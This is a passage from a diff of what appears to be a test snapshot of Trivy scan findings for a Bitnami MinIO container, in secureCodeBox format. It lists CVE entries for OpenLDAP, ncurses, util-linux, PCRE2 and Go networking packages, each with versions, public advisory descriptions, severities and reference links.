"https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://avd.aquasec.com/nvd/cve-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-15719", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "https://access.redhat.com/errata/RHBA-2019:3674", + "https://access.redhat.com/security/cve/CVE-2020-15719", + "https://bugs.openldap.org/show_bug.cgi?id=9266", + "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://avd.aquasec.com/nvd/cve-2020-15719", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://access.redhat.com/errata/RHBA-2019:3674", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/security/cve/CVE-2020-15719", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libmount1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncurses6", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", - ], - }, - "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "request smuggling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncurses6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + }, + { + "type": "URL", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in 